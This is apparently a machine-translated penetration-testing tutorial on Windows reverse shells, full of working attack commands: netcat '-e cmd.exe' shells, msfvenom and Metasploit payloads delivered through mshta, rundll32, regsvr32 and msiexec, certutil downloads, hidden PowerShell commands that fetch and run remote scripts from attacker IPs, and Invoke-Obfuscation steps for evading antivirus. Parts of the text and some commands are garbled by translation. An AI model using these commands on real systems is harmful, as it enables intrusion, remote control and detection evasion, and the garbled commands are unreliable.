The article directories

  • Rebound Shell introduction
  • Common rebound mode
    • NetCat (NC) rebounded
      • Forward NC
      • Reverse NC
    • Use mshta. Exe
      • MSF uses modules
        • Methods a (msfconsole)
        • Method 2 (msfvenom)
      • Cobaltstrike exploits modules
      • Hta attack source code
    • Rundll32. Exe
      • MSF uses modules
        • Methods a (msfconsole)
        • Method 2 (msfvenom)
      • Rundll32 loading the hta
    • Regsvr32. Exe
      • MSF uses modules
    • Use msiexec. Exe
      • MSF uses modules
  • Powershell script
    • PowerShell loads remote scripts
    • Powershell version NC
    • Bounce the shell through Web delivery
      • Msfconsole generated
      • CS is generated
    • Use powershell to execute the. VBS file
    • Execute. Bat files using Powershell
  • Bypass antivirus software
    • processes

Rebound Shell introduction

The rebound shell basically allows us to remotely connect to the target console and give instructions to control the target asset! Rebound shell is divided into:

  1. Forward rebound: The way in which the control (our own machine) sends a request to connect to the controlled (the target machine).

    However, this approach will be affected by many factors, such as firewall, routing, etc., and it is difficult to succeed.

  2. Reverse rebound: the controlled end actively sends a request to connect to our control end.

    This method is to find a way to avoid firewall and routing restrictions!

Common rebound mode

NetCat (NC) rebounded

Under normal circumstances, there is no NC in Windows system. If we want to use NC, we need to upload this program to the target machine first. Please find resources on the Internet.

After downloading a good NC, you cancdUse it in the download directory, or add the NC directory to the environment variable!

Forward NC

The forward bounce is to get the target machine ready and waiting for the attack aircraft to connect. So we need to execute commands on the controlled side now, and then connect on the control side!

# is accused of end
Use the more verbose (-vv) listening mode (-l) to listen for inbound information on the specified port number (p) and import the specified program (-e).
nc -lvvpThe port number-eUse the programIf the controller redirects the local Powershell program to port 6543, the controller only needs to actively connect to port 6543 to get the use of this program!
nc -lvvp 6543 -e powershell.exe

# control (currently my controlled address is :192.168.1.251)Nc Target IP address Port NC192.168.1.251 6543
Copy the code

The above Powershell can be replaced with CMD!

Reverse NC

Contrary to the positive direction, we now need to turn on the monitor in the control machine and wait for the controlled machine to actively connect to us!

The control side #
nc -lvvpport# if
nc -lvvp 4567
Controlled end (current IP address: 192.168.1.169)
nc -eUse the program target address port# if
nc -e cmd.exe 192.168.1.169 4567
Copy the code

Use mshta. Exe

Mshta.exe is a Windows system application responsible for interpreting running HTA(HTML application) files. You can run HTML files in JavaScript or VBScript. This is a Windows system in its own application! We can use the implementation of our. Hta Trojan to carry out shell rebound!

MSF uses modules

Methods a (msfconsole)

Exploit/Windows/misC/hTA_server

Enter the MSF module
use exploit/windows/misc/hta_server
We need to set srvhost and srvport, because this attack payload will open a Web service for the target to access! Srvhost and srvport are used to specify which IP address and port the service is enabled on. By default, 0.0.0.0 is enabled on all local IP addresses.
setSrvhost local IP# attack with the load, I am a Windows/x64 meterpreter/reverse_tcp
setPayload Attack payloadset payload windows/x64/meterpreter/reverse_tcp
The default is x86, here we choose X64
set target 1
Bind attack plane IP
setLhost 192.168.1.200# startup script
run
Copy the code



After the startup generates a target address, just let the target executeMshta Destination address(Mshta http://192.168.1.200:8080/PgE4ymVU3VQ.hta) to online target machine!

Method 2 (msfvenom)

The MSFvenom module also supports.hTA file generation

# /bin/bash to generate Trojan filesMsfvenom -p Windows/x64 meterpreter/reverse_tcp lhost = 192.168.1.200 lport = 4456 - f the hta - PSH - o (1) the hta# open a simple server for target machine to download Trojan (current download address to http://192.168.1.200:6123/1.hta)
python3 -m http.server 6123
# msfConsole performs listeningHandler - p Windows/x64 / meterpreter / 192.168.1.200 reverse_tcp - H - p 4456Copy the code



The target machine is also executingMshta http://192.168.1.200:6123/1.htaCan go online!

Cobaltstrike exploits modules

In addition to MSF, CS can also generate HTS files and use them!

First we select the generate backdoor optionHTML ApplicationAnd generate it.htafile



Then use the file download in the phishing tool to open a download service for the target to download



Then only target execution is requiredMshta http://43.128.11.131:8081/download/file.extYou can go online.

Note: The Trojan generated here is 32 bit, may run on 64 bit host problems! For 64-bit hosts, it’s best to run a Trojan generated in MSF!

Hta attack source code

According to the hTA Trojan generated by MSF above, we can see that this attack finally calls Powershell to perform some shell rebound operations! However, there are some obfuscation operations to reduce the possibility of soft discovery!

Rundll32. Exe

Those of you who have used Python know that Python is powerful because there are many libraries that support it. For example, if you want to generate a random number, you just call the Random library. The Dynamic Link Library (DLL) is a Library in Windows. It contains some common methods and allows different programs to call its code and data. In this case, rundll32.exe is a Windows program designed to call functions (16 or 32 bits) in these libraries (DLLS) and store them in the appropriate memory library.

MSF uses modules

Methods a (msfconsole)

Use modules: Exploit/Windows/SMB /smb_delivery Note here that we need to run MSF as root because port 445 will be called later and only root has permission to use this port.

# Use this module
use exploit/windows/smb/smb_delivery
Port 445 is used by default when downloading DLL files on the target machine.
Bind attack plane IP
setLhost 192.168.1.200Because port 4444 has been occupied, I change another port
set lport 4454
The rundll32.exe command is generated on the target machine
# rundll32. Exe \ \ 192.168.1.200 \ kbFWW \ test DLL, 0
Copy the code

Method 2 (msfvenom)

# Attack aircraft generate file
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.200 lport=5333 -f dll -o test.dll
# Open web service, provide Trojan download
python3 -m http.server
# enable monitor
handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.200 -P 5333

# Target download file (Certutil is a Windows native certificate service, which I covered in this Windows blog in common file transfer methods for penetration testing)
certutil.exe -urlcache -split -f http://192.168.1.200:7789/test.dll
# Execute DLL better write absolute path!!Rundll32 shell32.dll,Control_RunDLL C:\ Penetration test tool \test.dllCopy the code

Rundll32 loading the hta

Rundll32 can load not only DLLS but also Htas

# here I will call the same port 5333 as above, no need to generate listener
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.200 lport=5333 -f hta-psh > 1.hta
# Same as above, transfer our Trojan to the target machine
certutil.exe -urlcache -split -f http://192.168.1.200:7785/1.hta
Call url.dll to execute
rundll32.exe url.dll,OpenURL C:\Users\xunmi\1.hta
Copy the code

Regsvr32. Exe

Regsvr32 is also a DLL related program, which replicates the registration and logout of OLE controls. OLE(Object linking and Embedding) controls refer to the DLL and ActiveX controls in the Windows registry. This tool will be in the % Systemroot %\System32(C:\Windows\System32) folder by default

Regsvr32 Common attributes role
/u Log out of the server
/i Call DllInstall to pass an optional [cmdline]; When it is used with /u, it calls a DLL to unload
/n Do not call DllRegisterServer; This option must be used with/I
/s Silent; The message box is not displayed

MSF uses modules

Exploit /multi/script/web_delivery

Set the generated attack file to Regsvr32 format
set target 3
Select the attack payload
set payload windows/x64/meterpreter/reverse_tcp
Bind attack plane IP
set lhost 192.168.1.200
Set lport and srvport based on the port usage of your machine.
Copy the code

Use msiexec. Exe

Msi (MSI: Microsoft Installer) is used to explain the installation of msiexec. As I wrote in My Windows Always Install Elevated blog, we could take advantage of a bug in the.MSI installer to execute commands if the administrator was misconfigured. Those of you who are interested can check it out.

MSF uses modules

Here, the MSFvenom module is used to generate an MSI command package

# The same is a target
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.200 lport=4578 -f msi > 1.msi
# Mount it for download
python3 -m http.server 6542
# set listener
handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.200 -P 4578
# download execution (/q is silent execution/I does not output any log files)
msiexec /q /i http://192.168.1.200:6542/1.msi
Copy the code

Powershell script

Many of the above rebound shell commands will eventually call Powershell for rebound. As can be seen from the source code of the above mshta.exe attack, most of the various rebound shell scripts we generate are powershell scripts with various skins in essence.

PowerShell loads remote scripts

Generate powerShell bounce scripts
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.200 lport=4578 -f psh-reflection -o shell.ps1
# Mount it for download
python3 -m http.server 6542
# Execute rebound shell command (use hidden unrestricted bypass and load in memory (IEX remote script)
powershell -windowstyle hidden -exec bypass -c "The IEX (New - Object Net. WebClient). DownloadString (' http://192.168.1.200:6542/shell.ps1 ')";
Copy the code

After executing the bounce-back shell script in CMD on the target machine, a Powershell child is launched in CMD to execute our bounce-back commands frequently!

Powershell version NC

Open source download: github.com/besimorhino… First we need to upload this script to the target!

# Now start NC listening on our attack aircraft
nc -lvvp 12345
Then load the remote script and connect it to our attack plane
powershell -c "The IEX (New - Object System.Net.WebClient). DownloadString (' http://43.128.11.131:8000/powercat.ps1 '); Powercat -c 192.168.1.200 -p 12345 -e CMD"
Copy the code

Bounce the shell through Web delivery

Msfconsole generated

Use modules: use exploit/multi/script/web_delivery

use exploit/multi/script/web_delivery
# General configuration
set payload windows/x64/meterpreter/reverse_tcp
set target 2
set lhost 192.168.1.200
set lport 8525
run
Copy the code

CS is generated

The specific usage is as shown in the figure below. You only need to find a way to make the generated command execute by the target machine!

Use powershell to execute the. VBS file

To start. VBS we need to use script.exe, which can execute WSF, JS and VBscript scripts.

Start by generating a.vbs script
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.200 LPORT=7777 -f vbs -o 1.vbs
# Mount it for download
python3 -m http.server 6542
# start listening
handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.200 -P 7777
Execute the rebound shell command
powershell -c "(New - the Object System.NET.WebClient). DownloadFile (' http://192.168.1.200:6542/1.vbs', '$env:temp\test.vbs'); Start-Process cscript.exe '$env:temp\test.vbs'"
Copy the code

Execute. Bat files using Powershell

Bat is a batch file under Windows,Windows default can be directly called execution, in theory is quite convenient, but I did not successfully reproduce this method.

First generate a.bat script
msfvenom -p cmd/windows/powershell_reverse_tcp LHOST=192.168.1.200 LPORT=7788 -o 1.bat
# Mount it for download
python3 -m http.server 6542
# start listening
handler -p cmd/windows/powershell_reverse_tcp -H 192.168.1.200 -P 7788
Execute the rebound shell command
powershell -windowstyle hidden -exec bypass -c "The IEX (New - Object Net. WebClient). DownloadString (' http://192.168.1.200:6542/1.bat '); 1.bat";
powershell -c "The IEX (New - Object System.Net.WebClient). DownloadString (' http://192.168.1.200:6542/1.bat ')"
Copy the code

Bypass antivirus software

processes

Here I will mainly use a Powershell module called invoke-obfuscation for Obfuscation processing.

Set the powershell mode so that our script can run freely
powershell.exe -ep bypass
# load script
Import-Module. /Invoke-Obfuscation.psd1
# startup script
Invoke-Obfuscation
Copy the code



Sets the location of the source code to obfuscate

setScriptpath I: penetration test temporary file source rebound shell code. Ps1Copy the code



Set obfuscation mode

token\all
1
# or (same effect)
token\all\1
Copy the code



Output obfuscation file

Out I:\ penetration test \ temporary file \ obfuscated code. Ps1Copy the code



Contrast can be seen, this principle of confusion will be our original code keywords disorderly discharge, so that anti-virus software can not find our Trojan features! In addition toInvoke-ObfuscationThere are many other crypto-obfuscation features!